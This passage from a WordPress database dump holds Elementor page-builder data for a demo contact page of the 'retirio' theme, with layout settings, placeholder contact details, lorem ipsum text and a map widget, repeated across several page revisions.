Design\",\"_padding\":{\"unit\":\"%\",\"top\":\"0\",\"right\":\"25\",\"bottom\":\"0\",\"left\":\"25\",\"isLinked\":false},\"_padding_tablet\":{\"unit\":\"%\",\"top\":\"0\",\"right\":\"7\",\"bottom\":\"0\",\"left\":\"7\",\"isLinked\":false},\"_padding_mobile\":{\"unit\":\"%\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"content_typography_title_typography\":\"custom\",\"content_typography_title_font_size\":{\"unit\":\"px\",\"size\":25,\"sizes\":[]},\"link_address\":{\"url\":\"https:\\/\\/bauhaus.futuremediatrix.com\\/commercial\\/\",\"is_external\":false,\"nofollow\":false,\"custom_attributes\":\"\"},\"margin_title\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"retirio_elementor_heading\"},{\"id\":\"bb90e9f\",\"elType\":\"widget\",\"settings\":{\"link_to\":\"custom\",\"__dynamic__\":{\"link\":\"[elementor-tag id=\\\"9b229ae\\\" name=\\\"internal-url\\\" settings=\\\"%7B%22type%22%3A%22post%22%2C%22post_id%22%3A%224681%22%7D\\\"]\"}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false}]'),(2787,4714,'_elementor_page_assets','a:0:{}'),(2788,4714,'_elementor_pro_version','3.8.1'),(2789,4715,'_menu_item_type','custom'),(2790,4715,'_menu_item_menu_item_parent','0'),(2791,4715,'_menu_item_object_id','4715'),(2792,4715,'_menu_item_object','custom'),(2793,4715,'_menu_item_target',''),(2794,4715,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(2795,4715,'_menu_item_xfn',''),(2796,4715,'_menu_item_url','#'),(2798,1349,'_elementor_css','a:6:{s:4:\"time\";i:1668400742;s:5:\"fonts\";a:0:{}s:5:\"icons\";a:2:{i:0;s:8:\"fa-solid\";i:3;s:7:\"ovaicon\";}s:20:\"dynamic_elements_ids\";a:0:{}s:6:\"status\";s:4:\"file\";i:0;s:0:\"\";}'),(2808,4707,'_elementor_css','a:6:{s:4:\"time\";i:1668400811;s:5:\"fonts\";a:0:{}s:5:\"icons\";a:0:{}s:20:\"dynamic_elements_ids\";a:2:{i:0;s:7:\"f248593\";i:1;s:7:\"bb90e9f\";}s:6:\"status\";s:4:\"file\";i:0;s:0:\"\";}'),(2809,1354,'_edit_last','2'),(2810,1354,'_wp_old_slug','architecture'),(2812,1354,'_edit_lock','1685012007:2'),(2813,1349,'_edit_last','2'),(2814,1349,'_wp_old_slug','interior-work'),(2816,1349,'_edit_lock','1685012018:2'),(2853,40,'_edit_lock','1695734800:2'),(2862,4720,'_wp_page_template','elementor_header_footer'),(2863,4720,'_elementor_edit_mode','builder'),(2864,4720,'_elementor_template_type','wp-page'),(2865,4720,'_elementor_version','3.6.6'),(2866,4720,'_elementor_data','[{\"id\":\"cf0a9af\",\"elType\":\"section\",\"settings\":{\"structure\":\"22\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"-60\",\"left\":0,\"isLinked\":false},\"z_index\":5},\"elements\":[{\"id\":\"11277b7\",\"elType\":\"column\",\"settings\":{\"_column_size\":66,\"_inline_size\":57.332,\"_inline_size_tablet\":100,\"_inline_size_mobile\":100,\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"80\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"margin_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"60\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"25d4298\",\"elType\":\"widget\",\"settings\":{\"sub_title\":\"contact us\",\"title\":\"Feel free to get in touch with retirio\",\"description\":\"Aliquam hendrerit a augue insuscipit. Etiam aliquam massa quis des mauris commodo venenatis ligula commodo leez sed blandit convallis dignissim onec vel pellentesque neque.\\n\\n\",\"align_heading\":\"left\"},\"elements\":[],\"widgetType\":\"retirio_elementor_heading\"},{\"id\":\"2fd982e\",\"elType\":\"widget\",\"settings\":{\"icon\":{\"value\":\"ovaicon ovaicon-phone-call\",\"library\":\"ovaicon\"},\"label\":\"Have any question?\",\"items_info\":[{\"type\":\"phone\",\"email_label\":\"email@company.com\",\"email_address\":\"email@company.com\",\"_id\":\"8d67786\",\"phone_label\":\"Frre +23 (000)-9850\",\"phone_address\":\"+230009850\"}],\"icon_fontsize\":{\"unit\":\"px\",\"size\":30,\"sizes\":[]},\"icon_color\":\"#E3B25A\",\"icon_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"30\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"icon_padding\":{\"unit\":\"px\",\"top\":\"23\",\"right\":\"23\",\"bottom\":\"23\",\"left\":\"23\",\"isLinked\":true},\"border_icon_border\":\"solid\",\"border_icon_width\":{\"unit\":\"px\",\"top\":\"2\",\"right\":\"2\",\"bottom\":\"2\",\"left\":\"2\",\"isLinked\":true},\"label_typography_typography\":\"custom\",\"label_typography_font_size\":{\"unit\":\"px\",\"size\":16,\"sizes\":[]},\"label_typography_font_weight\":\"500\",\"label_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true},\"info_color\":\"#242424\",\"info_color_hover\":\"#E3B25A\",\"info_typography_typography\":\"custom\",\"info_typography_font_size\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"info_typography_font_weight\":\"bold\",\"_element_width\":\"inherit\",\"_element_vertical_align\":\"center\",\"show_dot_corner\":\"yes\",\"icon_dot_corner\":{\"unit\":\"px\",\"size\":8,\"sizes\":[]},\"icon_color_hover\":\"#FFFFFF\",\"dot_corner_color\":\"#E3B25A\"},\"elements\":[],\"widgetType\":\"retirio_elementor_contact_info\"},{\"id\":\"849b928\",\"elType\":\"widget\",\"settings\":{\"icon\":{\"value\":\"ovaicon ovaicon-letter\",\"library\":\"ovaicon\"},\"label\":\"Write email\",\"items_info\":[{\"email_label\":\"needhelp@company.com\",\"email_address\":\"needhelp@company.com\",\"_id\":\"8d67786\",\"phone_label\":\"Frre +23 (000)-9850\",\"phone_address\":\"+230009850\"}],\"icon_fontsize\":{\"unit\":\"px\",\"size\":30,\"sizes\":[]},\"icon_color\":\"#E3B25A\",\"icon_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"30\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"icon_padding\":{\"unit\":\"px\",\"top\":\"23\",\"right\":\"23\",\"bottom\":\"23\",\"left\":\"23\",\"isLinked\":true},\"border_icon_border\":\"solid\",\"border_icon_width\":{\"unit\":\"px\",\"top\":\"2\",\"right\":\"2\",\"bottom\":\"2\",\"left\":\"2\",\"isLinked\":true},\"label_typography_typography\":\"custom\",\"label_typography_font_size\":{\"unit\":\"px\",\"size\":16,\"sizes\":[]},\"label_typography_font_weight\":\"500\",\"label_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true},\"info_color\":\"#242424\",\"info_color_hover\":\"#E3B25A\",\"info_typography_typography\":\"custom\",\"info_typography_font_size\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"info_typography_font_weight\":\"bold\",\"_element_width\":\"inherit\",\"_element_vertical_align\":\"center\",\"show_dot_corner\":\"yes\",\"icon_dot_corner\":{\"unit\":\"px\",\"size\":8,\"sizes\":[]},\"icon_color_hover\":\"#FFFFFF\",\"dot_corner_color\":\"#E3B25A\"},\"elements\":[],\"widgetType\":\"retirio_elementor_contact_info\"},{\"id\":\"9baa065\",\"elType\":\"widget\",\"settings\":{\"icon\":{\"value\":\"ovaicon ovaicon-pin\",\"library\":\"ovaicon\"},\"label\":\"Visit anytime \",\"items_info\":[{\"type\":\"link\",\"email_label\":\"needhelp@company.com\",\"email_address\":\"needhelp@company.com\",\"_id\":\"8d67786\",\"phone_label\":\"Frre +23 (000)-9850\",\"phone_address\":\"+230009850\",\"link_label\":\"30 broklyn golden street. New York\",\"link_address\":{\"url\":\"https:\\/\\/goo.gl\\/maps\\/EzkDhhJPJ1XN4SKh6\",\"is_external\":false,\"nofollow\":false,\"custom_attributes\":\"\"}}],\"icon_fontsize\":{\"unit\":\"px\",\"size\":30,\"sizes\":[]},\"icon_color\":\"#E3B25A\",\"icon_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"30\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"icon_padding\":{\"unit\":\"px\",\"top\":\"23\",\"right\":\"23\",\"bottom\":\"23\",\"left\":\"23\",\"isLinked\":true},\"border_icon_border\":\"solid\",\"border_icon_width\":{\"unit\":\"px\",\"top\":\"2\",\"right\":\"2\",\"bottom\":\"2\",\"left\":\"2\",\"isLinked\":true},\"label_typography_typography\":\"custom\",\"label_typography_font_size\":{\"unit\":\"px\",\"size\":16,\"sizes\":[]},\"label_typography_font_weight\":\"500\",\"label_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true},\"info_color\":\"#242424\",\"info_color_hover\":\"#E3B25A\",\"info_typography_typography\":\"custom\",\"info_typography_font_size\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"info_typography_font_weight\":\"bold\",\"_element_width\":\"inherit\",\"_element_vertical_align\":\"center\",\"show_dot_corner\":\"yes\",\"icon_dot_corner\":{\"unit\":\"px\",\"size\":8,\"sizes\":[]},\"icon_color_hover\":\"#FFFFFF\",\"dot_corner_color\":\"#E3B25A\"},\"elements\":[],\"widgetType\":\"retirio_elementor_contact_info\"}],\"isInner\":false},{\"id\":\"3e7e3bc\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":42,\"_inline_size_tablet\":100,\"align\":\"center\",\"background_background\":\"classic\",\"background_color\":\"#242424\",\"background_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/bg.png\",\"id\":800,\"alt\":\"\",\"source\":\"library\"},\"background_position\":\"top right\",\"background_repeat\":\"no-repeat\",\"background_size\":\"cover\",\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"60\",\"bottom\":\"0\",\"left\":\"60\",\"isLinked\":false},\"padding_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"9fb7201\",\"elType\":\"widget\",\"settings\":{\"desk_logo\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/Logo-white.png\",\"id\":10,\"alt\":\"logo-retirio\",\"source\":\"library\"},\"desk_w\":{\"unit\":\"px\",\"size\":157,\"sizes\":[]},\"desk_h\":{\"unit\":\"px\",\"size\":40,\"sizes\":[]},\"mobile_logo\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/Logo-white.png\",\"id\":10,\"alt\":\"logo-retirio\",\"source\":\"library\"},\"mobile_w\":{\"unit\":\"px\",\"size\":157,\"sizes\":[]},\"mobile_h\":{\"unit\":\"px\",\"size\":40,\"sizes\":[]},\"sticky_logo\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/Logo-white.png\",\"id\":10,\"alt\":\"logo-retirio\",\"source\":\"library\"},\"sticky_w\":{\"unit\":\"px\",\"size\":157,\"sizes\":[]},\"sticky_h\":{\"unit\":\"px\",\"size\":40,\"sizes\":[]},\"_margin\":{\"unit\":\"px\",\"top\":\"30\",\"right\":\"0\",\"bottom\":\"30\",\"left\":\"0\",\"isLinked\":false},\"_element_width\":\"auto\",\"_element_vertical_align\":\"center\",\"logo_opacity_desktop\":{\"unit\":\"px\",\"size\":0.3,\"sizes\":[]},\"logo_opacity_mobile\":{\"unit\":\"px\",\"size\":0.3,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"ova_logo\"},{\"id\":\"62a6664\",\"elType\":\"widget\",\"settings\":{\"sub_title\":\"contact us \",\"title\":\"Write anytime\",\"content_typography_title_typography\":\"custom\",\"content_typography_title_font_size\":{\"unit\":\"px\",\"size\":36,\"sizes\":[]},\"color_title\":\"#FFFFFF\",\"content_typography_sub_title_typography\":\"custom\",\"content_typography_sub_title_font_size\":{\"unit\":\"px\",\"size\":16,\"sizes\":[]},\"_padding\":{\"unit\":\"px\",\"top\":\"30\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_element_width\":\"inherit\",\"_element_vertical_align\":\"center\",\"_border_border\":\"solid\",\"_border_width\":{\"unit\":\"px\",\"top\":\"1\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_border_color\":\"#3A3A3A\"},\"elements\":[],\"widgetType\":\"retirio_elementor_heading\"},{\"id\":\"21ccb5c\",\"elType\":\"widget\",\"settings\":{\"_padding\":{\"unit\":\"px\",\"top\":\"10\",\"right\":\"0\",\"bottom\":\"44\",\"left\":\"0\",\"isLinked\":false},\"_border_width\":{\"unit\":\"px\",\"top\":\"1\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_border_color\":\"#3A3A3A\",\"shortcode\":\"[contact-form-7 id=\\\"884\\\" title=\\\"Contact page\\\"]\",\"_css_classes\":\"ova-contact-page\"},\"elements\":[],\"widgetType\":\"shortcode\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"0ec9a68\",\"elType\":\"section\",\"settings\":{\"layout\":\"full_width\",\"gap\":\"no\"},\"elements\":[{\"id\":\"fc5198b\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"080f03e\",\"elType\":\"widget\",\"settings\":{\"address\":\"London Eye, London, United Kingdom\",\"height\":{\"unit\":\"px\",\"size\":475,\"sizes\":[]},\"height_tablet\":{\"unit\":\"px\",\"size\":350,\"sizes\":[]},\"css_filters_css_filter\":\"custom\",\"css_filters_brightness\":{\"unit\":\"px\",\"size\":93,\"sizes\":[]},\"css_filters_contrast\":{\"unit\":\"px\",\"size\":107,\"sizes\":[]},\"css_filters_saturate\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"zoom\":{\"unit\":\"px\",\"size\":14,\"sizes\":[]},\"hover_transition\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"google_maps\"}],\"isInner\":false}],\"isInner\":false}]'),(2867,4720,'_elementor_page_assets','a:0:{}'),(2868,4721,'_wp_page_template','elementor_header_footer'),(2869,4721,'_elementor_edit_mode','builder'),(2870,4721,'_elementor_template_type','wp-page'),(2871,4721,'_elementor_version','3.6.6'),(2872,4721,'_elementor_data','[{\"id\":\"cf0a9af\",\"elType\":\"section\",\"settings\":{\"structure\":\"22\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"-60\",\"left\":0,\"isLinked\":false},\"z_index\":5},\"elements\":[{\"id\":\"11277b7\",\"elType\":\"column\",\"settings\":{\"_column_size\":66,\"_inline_size\":57.332,\"_inline_size_tablet\":100,\"_inline_size_mobile\":100,\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"80\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"margin_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"60\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"25d4298\",\"elType\":\"widget\",\"settings\":{\"sub_title\":\"contact us\",\"title\":\"Feel free to get in touch with retirio\",\"description\":\"Aliquam hendrerit a augue insuscipit. Etiam aliquam massa quis des mauris commodo venenatis ligula commodo leez sed blandit convallis dignissim onec vel pellentesque neque.\\n\\n\",\"align_heading\":\"left\"},\"elements\":[],\"widgetType\":\"retirio_elementor_heading\"},{\"id\":\"2fd982e\",\"elType\":\"widget\",\"settings\":{\"icon\":{\"value\":\"ovaicon ovaicon-phone-call\",\"library\":\"ovaicon\"},\"label\":\"Have any question?\",\"items_info\":[{\"type\":\"phone\",\"email_label\":\"email@company.com\",\"email_address\":\"email@company.com\",\"_id\":\"8d67786\",\"phone_label\":\"Frre +23 (000)-9850\",\"phone_address\":\"+230009850\"}],\"icon_fontsize\":{\"unit\":\"px\",\"size\":30,\"sizes\":[]},\"icon_color\":\"#E3B25A\",\"icon_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"30\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"icon_padding\":{\"unit\":\"px\",\"top\":\"23\",\"right\":\"23\",\"bottom\":\"23\",\"left\":\"23\",\"isLinked\":true},\"border_icon_border\":\"solid\",\"border_icon_width\":{\"unit\":\"px\",\"top\":\"2\",\"right\":\"2\",\"bottom\":\"2\",\"left\":\"2\",\"isLinked\":true},\"label_typography_typography\":\"custom\",\"label_typography_font_size\":{\"unit\":\"px\",\"size\":16,\"sizes\":[]},\"label_typography_font_weight\":\"500\",\"label_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true},\"info_color\":\"#242424\",\"info_color_hover\":\"#E3B25A\",\"info_typography_typography\":\"custom\",\"info_typography_font_size\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"info_typography_font_weight\":\"bold\",\"_element_width\":\"inherit\",\"_element_vertical_align\":\"center\",\"show_dot_corner\":\"yes\",\"icon_dot_corner\":{\"unit\":\"px\",\"size\":8,\"sizes\":[]},\"icon_color_hover\":\"#FFFFFF\",\"dot_corner_color\":\"#E3B25A\"},\"elements\":[],\"widgetType\":\"retirio_elementor_contact_info\"},{\"id\":\"849b928\",\"elType\":\"widget\",\"settings\":{\"icon\":{\"value\":\"ovaicon ovaicon-letter\",\"library\":\"ovaicon\"},\"label\":\"Write email\",\"items_info\":[{\"email_label\":\"needhelp@company.com\",\"email_address\":\"needhelp@company.com\",\"_id\":\"8d67786\",\"phone_label\":\"Frre +23 (000)-9850\",\"phone_address\":\"+230009850\"}],\"icon_fontsize\":{\"unit\":\"px\",\"size\":30,\"sizes\":[]},\"icon_color\":\"#E3B25A\",\"icon_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"30\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"icon_padding\":{\"unit\":\"px\",\"top\":\"23\",\"right\":\"23\",\"bottom\":\"23\",\"left\":\"23\",\"isLinked\":true},\"border_icon_border\":\"solid\",\"border_icon_width\":{\"unit\":\"px\",\"top\":\"2\",\"right\":\"2\",\"bottom\":\"2\",\"left\":\"2\",\"isLinked\":true},\"label_typography_typography\":\"custom\",\"label_typography_font_size\":{\"unit\":\"px\",\"size\":16,\"sizes\":[]},\"label_typography_font_weight\":\"500\",\"label_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true},\"info_color\":\"#242424\",\"info_color_hover\":\"#E3B25A\",\"info_typography_typography\":\"custom\",\"info_typography_font_size\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"info_typography_font_weight\":\"bold\",\"_element_width\":\"inherit\",\"_element_vertical_align\":\"center\",\"show_dot_corner\":\"yes\",\"icon_dot_corner\":{\"unit\":\"px\",\"size\":8,\"sizes\":[]},\"icon_color_hover\":\"#FFFFFF\",\"dot_corner_color\":\"#E3B25A\"},\"elements\":[],\"widgetType\":\"retirio_elementor_contact_info\"},{\"id\":\"9baa065\",\"elType\":\"widget\",\"settings\":{\"icon\":{\"value\":\"ovaicon ovaicon-pin\",\"library\":\"ovaicon\"},\"label\":\"Visit anytime \",\"items_info\":[{\"type\":\"link\",\"email_label\":\"needhelp@company.com\",\"email_address\":\"needhelp@company.com\",\"_id\":\"8d67786\",\"phone_label\":\"Frre +23 (000)-9850\",\"phone_address\":\"+230009850\",\"link_label\":\"30 broklyn golden street. New York\",\"link_address\":{\"url\":\"https:\\/\\/goo.gl\\/maps\\/EzkDhhJPJ1XN4SKh6\",\"is_external\":false,\"nofollow\":false,\"custom_attributes\":\"\"}}],\"icon_fontsize\":{\"unit\":\"px\",\"size\":30,\"sizes\":[]},\"icon_color\":\"#E3B25A\",\"icon_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"30\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"icon_padding\":{\"unit\":\"px\",\"top\":\"23\",\"right\":\"23\",\"bottom\":\"23\",\"left\":\"23\",\"isLinked\":true},\"border_icon_border\":\"solid\",\"border_icon_width\":{\"unit\":\"px\",\"top\":\"2\",\"right\":\"2\",\"bottom\":\"2\",\"left\":\"2\",\"isLinked\":true},\"label_typography_typography\":\"custom\",\"label_typography_font_size\":{\"unit\":\"px\",\"size\":16,\"sizes\":[]},\"label_typography_font_weight\":\"500\",\"label_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true},\"info_color\":\"#242424\",\"info_color_hover\":\"#E3B25A\",\"info_typography_typography\":\"custom\",\"info_typography_font_size\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"info_typography_font_weight\":\"bold\",\"_element_width\":\"inherit\",\"_element_vertical_align\":\"center\",\"show_dot_corner\":\"yes\",\"icon_dot_corner\":{\"unit\":\"px\",\"size\":8,\"sizes\":[]},\"icon_color_hover\":\"#FFFFFF\",\"dot_corner_color\":\"#E3B25A\"},\"elements\":[],\"widgetType\":\"retirio_elementor_contact_info\"}],\"isInner\":false},{\"id\":\"3e7e3bc\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":42,\"_inline_size_tablet\":100,\"align\":\"center\",\"background_background\":\"classic\",\"background_color\":\"#242424\",\"background_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/bg.png\",\"id\":800,\"alt\":\"\",\"source\":\"library\"},\"background_position\":\"top right\",\"background_repeat\":\"no-repeat\",\"background_size\":\"cover\",\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"60\",\"bottom\":\"0\",\"left\":\"60\",\"isLinked\":false},\"padding_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"9fb7201\",\"elType\":\"widget\",\"settings\":{\"desk_logo\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/Logo-white.png\",\"id\":10,\"alt\":\"logo-retirio\",\"source\":\"library\"},\"desk_w\":{\"unit\":\"px\",\"size\":157,\"sizes\":[]},\"desk_h\":{\"unit\":\"px\",\"size\":40,\"sizes\":[]},\"mobile_logo\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/Logo-white.png\",\"id\":10,\"alt\":\"logo-retirio\",\"source\":\"library\"},\"mobile_w\":{\"unit\":\"px\",\"size\":157,\"sizes\":[]},\"mobile_h\":{\"unit\":\"px\",\"size\":40,\"sizes\":[]},\"sticky_logo\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/Logo-white.png\",\"id\":10,\"alt\":\"logo-retirio\",\"source\":\"library\"},\"sticky_w\":{\"unit\":\"px\",\"size\":157,\"sizes\":[]},\"sticky_h\":{\"unit\":\"px\",\"size\":40,\"sizes\":[]},\"_margin\":{\"unit\":\"px\",\"top\":\"30\",\"right\":\"0\",\"bottom\":\"30\",\"left\":\"0\",\"isLinked\":false},\"_element_width\":\"auto\",\"_element_vertical_align\":\"center\",\"logo_opacity_desktop\":{\"unit\":\"px\",\"size\":0.3,\"sizes\":[]},\"logo_opacity_mobile\":{\"unit\":\"px\",\"size\":0.3,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"ova_logo\"},{\"id\":\"62a6664\",\"elType\":\"widget\",\"settings\":{\"sub_title\":\"contact us \",\"title\":\"Write anytime\",\"content_typography_title_typography\":\"custom\",\"content_typography_title_font_size\":{\"unit\":\"px\",\"size\":36,\"sizes\":[]},\"color_title\":\"#FFFFFF\",\"content_typography_sub_title_typography\":\"custom\",\"content_typography_sub_title_font_size\":{\"unit\":\"px\",\"size\":16,\"sizes\":[]},\"_padding\":{\"unit\":\"px\",\"top\":\"30\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_element_width\":\"inherit\",\"_element_vertical_align\":\"center\",\"_border_border\":\"solid\",\"_border_width\":{\"unit\":\"px\",\"top\":\"1\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_border_color\":\"#3A3A3A\"},\"elements\":[],\"widgetType\":\"retirio_elementor_heading\"},{\"id\":\"21ccb5c\",\"elType\":\"widget\",\"settings\":{\"_padding\":{\"unit\":\"px\",\"top\":\"10\",\"right\":\"0\",\"bottom\":\"44\",\"left\":\"0\",\"isLinked\":false},\"_border_width\":{\"unit\":\"px\",\"top\":\"1\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_border_color\":\"#3A3A3A\",\"shortcode\":\"[contact-form-7 id=\\\"884\\\" title=\\\"Contact page\\\"]\",\"_css_classes\":\"ova-contact-page\"},\"elements\":[],\"widgetType\":\"shortcode\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"0ec9a68\",\"elType\":\"section\",\"settings\":{\"layout\":\"full_width\",\"gap\":\"no\"},\"elements\":[{\"id\":\"fc5198b\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"080f03e\",\"elType\":\"widget\",\"settings\":{\"address\":\"London Eye, London, United Kingdom\",\"height\":{\"unit\":\"px\",\"size\":475,\"sizes\":[]},\"height_tablet\":{\"unit\":\"px\",\"size\":350,\"sizes\":[]},\"css_filters_css_filter\":\"custom\",\"css_filters_brightness\":{\"unit\":\"px\",\"size\":93,\"sizes\":[]},\"css_filters_contrast\":{\"unit\":\"px\",\"size\":107,\"sizes\":[]},\"css_filters_saturate\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"zoom\":{\"unit\":\"px\",\"size\":14,\"sizes\":[]},\"hover_transition\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"google_maps\"}],\"isInner\":false}],\"isInner\":false}]'),(2873,4721,'_elementor_page_assets','a:0:{}'),(2874,4722,'_wp_page_template','elementor_header_footer'),(2875,4722,'_elementor_edit_mode','builder'),(2876,4722,'_elementor_template_type','wp-page'),(2877,4722,'_elementor_version','3.6.6'),(2878,4722,'_elementor_data','[{\"id\":\"cf0a9af\",\"elType\":\"section\",\"settings\":{\"structure\":\"22\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"-60\",\"left\":0,\"isLinked\":false},\"z_index\":5},\"elements\":[{\"id\":\"11277b7\",\"elType\":\"column\",\"settings\":{\"_column_size\":66,\"_inline_size\":57.332,\"_inline_size_tablet\":100,\"_inline_size_mobile\":100,\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"80\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"margin_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"60\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"25d4298\",\"elType\":\"widget\",\"settings\":{\"sub_title\":\"contact us\",\"title\":\"Feel free to get in touch with retirio\",\"description\":\"Aliquam hendrerit a augue insuscipit. Etiam aliquam massa quis des mauris commodo venenatis ligula commodo leez sed blandit convallis dignissim onec vel pellentesque neque.\\n\\n\",\"align_heading\":\"left\"},\"elements\":[],\"widgetType\":\"retirio_elementor_heading\"},{\"id\":\"2fd982e\",\"elType\":\"widget\",\"settings\":{\"icon\":{\"value\":\"ovaicon ovaicon-phone-call\",\"library\":\"ovaicon\"},\"label\":\"Have any question?\",\"items_info\":[{\"type\":\"phone\",\"email_label\":\"email@company.com\",\"email_address\":\"email@company.com\",\"_id\":\"8d67786\",\"phone_label\":\"Frre +23 (000)-9850\",\"phone_address\":\"+230009850\"}],\"icon_fontsize\":{\"unit\":\"px\",\"size\":30,\"sizes\":[]},\"icon_color\":\"#E3B25A\",\"icon_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"30\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"icon_padding\":{\"unit\":\"px\",\"top\":\"23\",\"right\":\"23\",\"bottom\":\"23\",\"left\":\"23\",\"isLinked\":true},\"border_icon_border\":\"solid\",\"border_icon_width\":{\"unit\":\"px\",\"top\":\"2\",\"right\":\"2\",\"bottom\":\"2\",\"left\":\"2\",\"isLinked\":true},\"label_typography_typography\":\"custom\",\"label_typography_font_size\":{\"unit\":\"px\",\"size\":16,\"sizes\":[]},\"label_typography_font_weight\":\"500\",\"label_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true},\"info_color\":\"#242424\",\"info_color_hover\":\"#E3B25A\",\"info_typography_typography\":\"custom\",\"info_typography_font_size\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"info_typography_font_weight\":\"bold\",\"_element_width\":\"inherit\",\"_element_vertical_align\":\"center\",\"show_dot_corner\":\"yes\",\"i